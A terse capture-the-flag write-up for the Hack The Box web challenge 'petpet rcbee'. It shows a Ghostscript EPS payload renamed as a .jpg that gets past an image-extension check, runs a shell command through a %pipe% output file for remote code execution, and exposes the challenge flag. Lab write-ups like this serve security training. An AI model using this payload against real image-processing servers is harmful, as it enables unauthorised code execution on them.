petpet rcbee

 http://188.166.169.77:30148
 from code:
 ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
 upload png, jpg, and jpeg files test, success.
 It's remote code execution on the website via a jpg/png/jpeg extension file.
 pet.jpg
 %!PS-Adobe-3.0 EPSF-3.0
 %%BoundingBox: -0 -0 100 100
 userdict /setpagedevice undef
 save
 legal
 { null restore } stopped { pop } if
 { legal } stopped { pop } if
 restore
 mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/flag.txt) currentdevice putdeviceprops
 upload and then: 
 http://188.166.169.77:30148/static/petpets/flag.txt
 HTB{c0mfy_bzzzzz_rcb33s_v1b3s}